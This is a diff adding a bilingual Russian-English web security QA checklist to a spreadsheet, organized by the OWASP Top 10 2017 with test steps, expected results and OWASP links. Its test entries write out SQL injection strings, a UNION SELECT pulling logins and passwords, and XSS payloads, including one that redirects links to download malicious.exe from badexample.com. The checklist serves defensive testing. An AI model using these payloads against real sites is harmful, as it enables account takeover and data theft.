--- a/Security/Checklist.xlsx
+++ b/Security/Checklist.xlsx
@@ -1,7 +1,7 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <fileVersion appName="xl" lastEdited="4" lowestEdited="4" rupBuild="4505"/>
+  <fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9302"/>
   <workbookPr filterPrivacy="1" defaultThemeVersion="124226"/>
   <bookViews>
     <workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/>
@@ -11,13 +11,563 @@
     <sheet name="Лист2" sheetId="2" r:id="rId2"/>
     <sheet name="Лист3" sheetId="3" r:id="rId3"/>
   </sheets>
-  <calcPr calcId="122211" fullCalcOnLoad="1"/>
+  <calcPr calcId="122211"/>
 </workbook>
 </file>
 
+<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="143" uniqueCount="129">
+  <si>
+    <t>№</t>
+  </si>
+  <si>
+    <t>Description</t>
+  </si>
+  <si>
+    <t>Expected result</t>
+  </si>
+  <si>
+    <t>Screenshot</t>
+  </si>
+  <si>
+    <t>Related projects/QA</t>
+  </si>
+  <si>
+    <t>Comments (Testing instructions OWASP)</t>
+  </si>
+  <si>
+    <r>
+      <t>A1:2017-Injection</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t xml:space="preserve"> Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</t>
+    </r>
+  </si>
+  <si>
+    <t>Передать специальную строку вместо ввода логина:
+ any_user' or 1=1);--</t>
+  </si>
+  <si>
+    <t>Result if there is a vulnerability: you will log in under the first user in the table</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</t>
+  </si>
+  <si>
+    <t>Send a special string instead of entering a login:
+ any_user " or 1 = 1); -</t>
+  </si>
+  <si>
+    <t>Send a special string instead of entering a password:
+ xxx ’) OR 1 = 1 -]</t>
+  </si>
+  <si>
+    <t>Send a special string instead of entering a password:
+ ’OR 1 = 1 - -</t>
+  </si>
+  <si>
+    <t>All parameters filled in via a form are transmitted to the server by one of two methods - GET or POST. The most common parameter passed through GET is id. This is one of the most vulnerable places for attacks, no matter what type of URL you use - http: //example.com/users/? id = 1`, or `http: // example.com / users / 1`, or` http: //......./.../post / 35`.
+   What happens if we substitute the following code in the URL?
+  AND 1 = 0 UNION SELECT 1, concat (login, password), 3,4,5,6 FROM users WHERE id = 1; -</t>
+  </si>
+  <si>
+    <t>https://prnt.sc/ndml8e</t>
+  </si>
+  <si>
+    <t>Send a special string instead of entering a password:
+ any_user 'or (1 = 1 and id = 3)); -</t>
+  </si>
+  <si>
+    <t>Result if there is a vulnerability: you log in as a user who is in the table under id = 3</t>
+  </si>
+  <si>
+    <t>In some cases, developers check the user in the database using LIKE, and do not process user input. Therefore, you need to check the combination "%%% / %%%" (the% sign is repeated 3 times to bypass validation to the minimum length</t>
+  </si>
+  <si>
+    <t>Consider the following SQL query: SELECT * FROM products WHERE id_product=$id_product Consider also the request to a script who executes the query above: http://www.example.com/product.php?id=10 When the tester tries a valid value (e.g. 10 in this case), the application will return the description of a product. A good way to test if the application is vulnerable in this scenario is play with logic, using the operators AND and OR. Consider the request: http://www.example.com/product.php?id=10 AND 1=2 SELECT * FROM products WHERE id_product=10 AND 1=2  In this case, probably the application would return some message telling us there is no content available or a blank page. Then the tester can send a true statement and check if there is a valid result: http://www.example.com/product.php?id=10 AND 1=1</t>
+  </si>
+  <si>
+    <t>Depending on the API which the web application is using and the DBMS (e.g. PHP + PostgreSQL, ASP+SQL SERVER) it may be possible to execute multiple queries in one call.
+ Consider the following SQL query: SELECT * FROM products WHERE id_product=$id_product A way to exploit the above scenario would be: http://www.example.com/product.php?id=10; INSERT INTO users (…)</t>
+  </si>
+  <si>
+    <t>This way is possible to execute many queries in a row and independent of the first query.</t>
+  </si>
+  <si>
+    <t>To know what the back end database is.
+ 1) The first way to find out what back end database is used is by observing the error returned by the application. The following are some examples of error messages:
+ MySql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 One complete UNION SELECT with version() can also help to know the back end database. SELECT id, name FROM users WHERE id=1 UNION SELECT 1, version() limit 1,1 Oracle: ORA-00933: SQL command not properly ended MS SQL Server: Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string SELECT id, name FROM users WHERE id=1 UNION SELECT 1, @@version limit 1, 1 PostgreSQL: Query failed: ERROR: syntax error at or near "’" at character 56 in /www/site/test.php on line 121. 2) If there is no error message or a custom error message, the tester can try to inject into string fields using varying concatenation techniques: MySql: ‘test’ + ‘ing’ SQL Server: ‘test’ ‘ing’ Oracle: ‘test’||’ing’ PostgreSQL: ‘test’||’ing’</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A2:2017-Broken Authentication
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t xml:space="preserve"> Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.</t>
+    </r>
+  </si>
+  <si>
+    <t>Forbiddance of clicking on a link to an unregistered user</t>
+  </si>
+  <si>
+    <t>For example, you give admin url - the user without rights goes there for a direct link</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet#Testing_2</t>
+  </si>
+  <si>
+    <t>Enter the correct username and correct password. Copy the resulting url and paste it into another browser</t>
+  </si>
+  <si>
+    <t>Expected: It should not display the user’s welcome page</t>
+  </si>
+  <si>
+    <t>Enter a valid username and password.
+ Log out. Clear cache and cookies (open / close browser?)</t>
+  </si>
+  <si>
+    <t>Expected: successfully logged in.</t>
+  </si>
+  <si>
+    <t>Enter the correct username and correct password. Click on the "Back" button in the browser</t>
+  </si>
+  <si>
+    <t>Expected: it is not clear - or The page should be expired, or see the same fields. If the second is to enter the login and password again. Go to. Logged in?</t>
+  </si>
+  <si>
+    <t>Check for invalid login / password error message</t>
+  </si>
+  <si>
+    <t>The message should not indicate which parameter is incorrect.</t>
+  </si>
+  <si>
+    <t>Open the first browser. Log in with a valid user. Open a second browser. Log in with the same valid user. Log out in the first browser. Go to the second browser. Do something that only a logged in user can do</t>
+  </si>
+  <si>
+    <t>Open the browser. Enter valid data in the fields. Click the Login button. Turn off internet. Get "page unavailable." Connect the Internet back. Go on the website</t>
+  </si>
+  <si>
+    <t>Expected: not logged in</t>
+  </si>
+  <si>
+    <t>Trace, if the data is transmitted in the address bar of the browser in the form "login = bla-bla &amp; password = bla-bla"</t>
+  </si>
+  <si>
+    <t>Login through third-party services (social network, etc. if available) when no agreement is made to use data from this service</t>
+  </si>
+  <si>
+    <t>Expected: login fails, return to login page</t>
+  </si>
+  <si>
+    <t>Login through third-party services (social network, etc. if available) when the permission to use data in the third-party service itself is removed</t>
+  </si>
+  <si>
+    <t>Expected: Repeat request to use data from the service at login</t>
+  </si>
+  <si>
+    <t>Change password / Forgot password for unregistered user in the system</t>
+  </si>
+  <si>
+    <t>Expected: sending a hash of the link does not occur, a validation message that such a user was not found in the system</t>
+  </si>
+  <si>
+    <t>Change password / Forgot password</t>
+  </si>
+  <si>
+    <t>Expected: All active user sessions should be destroyed when the user changes their password.</t>
+  </si>
+  <si>
+    <t>Expected: Login with old password is not available</t>
+  </si>
+  <si>
+    <t>Make sure that if the user is logged out or the session is completed, he can not use the site</t>
+  </si>
+  <si>
+    <t>Check the user account gets locked out if the user is entering the wrong password several times (according to your project specification)</t>
+  </si>
+  <si>
+    <t>Ensure the unauthorized access to secure pages is not possible</t>
+  </si>
+  <si>
+    <t>A password policy should be created and implemented so that passwords meet specific strength criteria</t>
+  </si>
+  <si>
+    <t>Make sure that if the password is changed, the user cannot log in under the old one</t>
+  </si>
+  <si>
+    <t>Check user rights and their roles. For example, a candidate should not be able to access the admin page</t>
+  </si>
+  <si>
+    <t>Check the Session Timeout</t>
+  </si>
+  <si>
+    <t>Sensitive fields like passwords and credit card information should not have to autocomplete enabled</t>
+  </si>
+  <si>
+    <t>Check the cookies should not store passwords</t>
+  </si>
+  <si>
+    <t>Testing for Browser cache weakness</t>
+  </si>
+  <si>
+    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
+  </si>
+  <si>
+    <t>Check that password sent in URL might not be cached or stored in log files</t>
+  </si>
+  <si>
+    <t>Do not send sensitive information as GET parameter. Instead, use POST parameters to transfer the
+password.</t>
+  </si>
+  <si>
+    <t>Check Application vulnerable to session fixation as no new cookie is issues after login.
+If the session cookie is not re-issued after a successful login, it would be possible to launch session fixation attacks against a user. Session fixation attacks occur when an attacker is able to choose a
+session token before authentication and force a victim to use that to authenticate. In most cases this requires the attacker to have physical access to the victim’s computer. But there also exist vulnerabilities
+that allow an attacker to stage this attack remotely with forged URLs and Social Engineering.</t>
+  </si>
+  <si>
+    <t>It is recommended to re-issue a new session token upon authentication and after any significant change
+of authorization state (such as password change).</t>
+  </si>
+  <si>
+    <t>Check Password insecurely transferred to user.
+If the password specified at registration is sent to the user in a clear-text email and furthermore the user
+is not forced to change the password after the first login, attackers with the ability to intercept user
+emails will be able to extract the password and authenticate.</t>
+  </si>
+  <si>
+    <t>Do not transfer the password in a clear-text email. The application does not require the password to be
+sent at all. This feature should therefore be removed entirely.</t>
+  </si>
+  <si>
+    <t>Check that Usernames can not be enumerated.
+It shouldn’t be possible to enumerate user names using the login and password recovery functionality.
+The application uses email addresses for login names. If a registration attempt is made using an existing email address, the application notifies the user that an account with that email already exists. Similarly,
+if an attempt is made to recover a password, the user has to supply the email address of the account that needs to be recovered. If the email address is indeed valid and exists in the application, the server's
+response indicates that an email was sent to the address.</t>
+  </si>
+  <si>
+    <t>The application should not disclose via error messages whether a user name exists in the application or
+not. Ideally, the application would return a generic message, such as “if a user with that name exists, an
+email was sent to the user’s email address”.</t>
+  </si>
+  <si>
+    <t>Check that Sessions are invalid on server side after logout.
+If user sessions are not terminated on server side after logout, attackers who are able to steal the session cookies from their victim could still use them even after their victim logged out. If the cookie is
+unset in the user browser, the session cookie shouldn’t be valid on server side too.</t>
+  </si>
+  <si>
+    <t>Ensure that sessions are invalidated on server side. It is also important that server side sessions are
+invalidated after a certain idle time of the user. That way, the attack surface against active sessions can
+be reduced significantly.</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A3:2017-Sensitive Data Exposure
+ </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.</t>
+    </r>
+  </si>
+  <si>
+    <t>Check the web page which contains important data like password, credit card numbers, secret answers for security question etc should be submitted via HTTPS (SSL)</t>
+  </si>
+  <si>
+    <t>Check the “View Source code” option is disabled and should not be visible to the user</t>
+  </si>
+  <si>
+    <t>Check the cookie information is stored in encrypted format</t>
+  </si>
+  <si>
+    <t>Check the error messages should not display any important information</t>
+  </si>
+  <si>
+    <t>Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Weak_SSL/TLS_Ciphers,_Insufficient_Transport_Layer_Protection_(OTG-CRYPST-001)</t>
+  </si>
+  <si>
+    <t>Testing for Padding Oracle</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Padding_Oracle_(OTG-CRYPST-002)</t>
+  </si>
+  <si>
+    <t>Testing for Sensitive information sent via unencrypted channels</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Sensitive_information_sent_via_unencrypted_channels_(OTG-CRYPST-003)</t>
+  </si>
+  <si>
+    <t>Make sure that important operations are written to the logs, and the information can be tracked</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A4:2017-XML External Entities (XXE)
+ </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.</t>
+    </r>
+  </si>
+  <si>
+    <t>Testing for XML Injection</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A5:2017-Broken Access Control
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t xml:space="preserve"> Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.</t>
+    </r>
+  </si>
+  <si>
+    <t>DevOps</t>
+  </si>
+  <si>
+    <t>https://prnt.sc/nfy0ax</t>
+  </si>
+  <si>
+    <t>Testing Directory traversal/file include</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)</t>
+  </si>
+  <si>
+    <t>Testing for Bypassing Authorization Schema</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Bypassing_Authorization_Schema_(OTG-AUTHZ-002)</t>
+  </si>
+  <si>
+    <t>Testing for Privilege escalation</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)</t>
+  </si>
+  <si>
+    <t>Testing for Insecure Direct Object References</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A6:2017-Security Misconfiguration
+ </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.</t>
+    </r>
+  </si>
+  <si>
+    <t>When clicking on this link, info about php settings on the server should not be displayed
+ http://yoursite.com/info.php</t>
+  </si>
+  <si>
+    <t>Testing for Error Code</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Error_Code_(OTG-ERR-001)</t>
+  </si>
+  <si>
+    <t>Testing for configuration management</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_configuration_management</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A7:2017-Cross-Site Scripting (XSS)
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t xml:space="preserve"> XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</t>
+    </r>
+  </si>
+  <si>
+    <t>Try to embed code in a form element
+ (eg in the form field Message / name)
+ &lt;script&gt;alert(“Security test”);&lt;/script&gt;</t>
+  </si>
+  <si>
+    <t>Result if there is a vulnerability: a modal window will appear with the text</t>
+  </si>
+  <si>
+    <t>https://prnt.sc/ncvutx</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)</t>
+  </si>
+  <si>
+    <t>Try to embed the script in the URL (if the URL contains any parameter = value, replace the value with the script
+ &lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
+  </si>
+  <si>
+    <t>Result if there is a vulnerability: cookie information will be displayed</t>
+  </si>
+  <si>
+    <t>https://prnt.sc/ncvxwg</t>
+  </si>
+  <si>
+    <t>Try to embed code in a form element
+ &lt;script&gt;document.getElementByID(«…»).disabled=true&lt;/script&gt;</t>
+  </si>
+  <si>
+    <t>Result if there is a vulnerability: displays information about the element with id = 1</t>
+  </si>
+  <si>
+    <t>Enter the html tags in the login field
+ &lt;form action=»http://live.hh.ru»&gt;&lt;input type=»submit»&gt;&lt;/form&gt;</t>
+  </si>
+  <si>
+    <t>Enter in the login field a complex sequence of characters like "♣ ☺♂", "" '~! @ # $% ^ &amp; * ()?&gt;,. / \ &lt;] [/ * &lt;! - "," $ {code} "; -&gt;</t>
+  </si>
+  <si>
+    <t>Try to embed code in form element
+ &lt;img src=o onerror=alert(1)&gt;</t>
+  </si>
+  <si>
+    <t>http://example.com/index.php?user=&lt;script&gt;window.onload = function() {var AllLinks=document.getElementsByTagName("a"); 
+ AllLinks[0].href = "http://badexample.com/malicious.exe"; }&lt;/script&gt;</t>
+  </si>
+  <si>
+    <t>This produces the following behavior: http://joxi.ru/bmoEqe0I390JYA
+ This will cause the user, clicking on the link supplied by the tester, to download the file malicious.exe from a site he controls.</t>
+  </si>
+  <si>
+    <t>Identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:
+ User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
+ Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
+ File Manager: application that allows upload of files
+ Application settings/preferences: application that allows the user to set preferences
+ Forum/Message board: application that permits exchange of posts among users
+ Blog: if the blog application permits to users submitting comments
+ Log: if the application stores some users input into logs.</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)#Black_Box_testing</t>
+  </si>
+  <si>
+    <t>DOM-based Cross Site Scripting
+The application shouldn’t to be vulnerable to DOM-based Cross Site Scripting (XSS). Attackers could
+inject malicious HTML and script code used to steal credentials and other data or hijack sessions, for
+example. Different to other XSS attacks, DOM-based XSS payloads might not be sent to the server.
+Server-side enforced input and output validation routines could therefore prove to be ineffective.</t>
+  </si>
+  <si>
+    <t>User input should never be trusted. All input and output in client-side script code should therefore be
+sanitized from dangerous content or encoded sufficiently.</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A8:2017-Insecure Deserialization
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t xml:space="preserve"> Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.</t>
+    </r>
+  </si>
+  <si>
+    <t>Testing for Cross Site Request Forgery</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A9:2017-Using Components with Known Vulnerabilities
+ </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.</t>
+    </r>
+  </si>
+  <si>
+    <t>Using frameworks, libraries with already known vulnerabilities, irregular updating of versions.</t>
+  </si>
+  <si>
+    <t>Check Map Application Architecture</t>
+  </si>
+  <si>
+    <t>https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">A10:2017-Insufficient Logging&amp;Monitoring
+ </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.</t>
+    </r>
+  </si>
+  <si>
+    <t>The easiest way that suits webmasters and SEO-specialists is to get the status codes of all pages on the site. You can make such a check in large quantities using client and browser software for site auditing. For example, Netpeak Spider and Rookee.</t>
+  </si>
+</sst>
+</file>
+
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <fonts count="1">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+  <fonts count="13" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color theme="1"/>
@@ -25,16 +575,105 @@
       <family val="2"/>
       <scheme val="minor"/>
     </font>
+    <font>
+      <b/>
+      <sz val="12"/>
+      <color rgb="FF000000"/>
+      <name val="Arial"/>
+    </font>
+    <font>
+      <b/>
+      <i/>
+      <sz val="12"/>
+      <color rgb="FF222222"/>
+      <name val="Arial"/>
+    </font>
+    <font>
+      <sz val="9"/>
+      <name val="Arial"/>
+    </font>
+    <font>
+      <sz val="11"/>
+      <name val="Arial"/>
+    </font>
+    <font>
+      <sz val="10"/>
+      <name val="Arial"/>
+    </font>
+    <font>
+      <sz val="10"/>
+      <color rgb="FF000000"/>
+      <name val="Calibri"/>
+    </font>
+    <font>
+      <u/>
+      <sz val="11"/>
+      <color rgb="FF0563C1"/>
+      <name val="Calibri"/>
+    </font>
+    <font>
+      <u/>
+      <sz val="10"/>
+      <color rgb="FF000000"/>
+      <name val="Calibri"/>
+    </font>
+    <font>
+      <sz val="10"/>
+      <name val="Calibri"/>
+    </font>
+    <font>
+      <b/>
+      <i/>
+      <sz val="12"/>
+      <color rgb="FF222222"/>
+      <name val="Calibri"/>
+    </font>
+    <font>
+      <u/>
+      <sz val="10"/>
+      <color rgb="FF0563C1"/>
+      <name val="Calibri"/>
+    </font>
+    <font>
+      <u/>
+      <sz val="10"/>
+      <color rgb="FF0000FF"/>
+      <name val="Arial"/>
+    </font>
   </fonts>
-  <fills count="2">
+  <fills count="6">
     <fill>
       <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
     </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FFFFE699"/>
+        <bgColor rgb="FFFFE699"/>
+      </patternFill>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FFEA9999"/>
+        <bgColor rgb="FFEA9999"/>
+      </patternFill>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FFD9D9D9"/>
+        <bgColor rgb="FFD9D9D9"/>
+      </patternFill>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FFFFFFFF"/>
+        <bgColor rgb="FFFFFFFF"/>
+      </patternFill>
+    </fill>
   </fills>
-  <borders count="1">
+  <borders count="8">
     <border>
       <left/>
       <right/>
@@ -42,25 +681,168 @@
       <bottom/>
       <diagonal/>
     </border>
+    <border>
+      <left style="thin">
+        <color rgb="FF000000"/>
+      </left>
+      <right style="thin">
+        <color rgb="FF000000"/>
+      </right>
+      <top style="thin">
+        <color rgb="FF000000"/>
+      </top>
+      <bottom style="thin">
+        <color rgb="FF000000"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left style="thin">
+        <color rgb="FF000000"/>
+      </left>
+      <right/>
+      <top style="thin">
+        <color rgb="FF000000"/>
+      </top>
+      <bottom style="thin">
+        <color rgb="FF000000"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right/>
+      <top style="thin">
+        <color rgb="FF000000"/>
+      </top>
+      <bottom style="thin">
+        <color rgb="FF000000"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right style="thin">
+        <color rgb="FF000000"/>
+      </right>
+      <top style="thin">
+        <color rgb="FF000000"/>
+      </top>
+      <bottom style="thin">
+        <color rgb="FF000000"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left style="thin">
+        <color rgb="FFCCCCCC"/>
+      </left>
+      <right style="thin">
+        <color rgb="FFCCCCCC"/>
+      </right>
+      <top/>
+      <bottom style="thin">
+        <color rgb="FFCCCCCC"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left/>
+      <right style="thin">
+        <color rgb="FFCCCCCC"/>
+      </right>
+      <top/>
+      <bottom style="thin">
+        <color rgb="FFCCCCCC"/>
+      </bottom>
+      <diagonal/>
+    </border>
+    <border>
+      <left style="thin">
+        <color rgb="FFCCCCCC"/>
+      </left>
+      <right style="thin">
+        <color rgb="FFCCCCCC"/>
+      </right>
+      <top style="thin">
+        <color rgb="FFCCCCCC"/>
+      </top>
+      <bottom style="thin">
+        <color rgb="FFCCCCCC"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="1">
+  <cellXfs count="18">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="10" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
   </cellXfs>
   <cellStyles count="1">
-    <cellStyle name="Normal" xfId="0" builtinId="0"/>
+    <cellStyle name="Обычный" xfId="0" builtinId="0"/>
   </cellStyles>
   <dxfs count="0"/>
   <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleMedium9"/>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}">
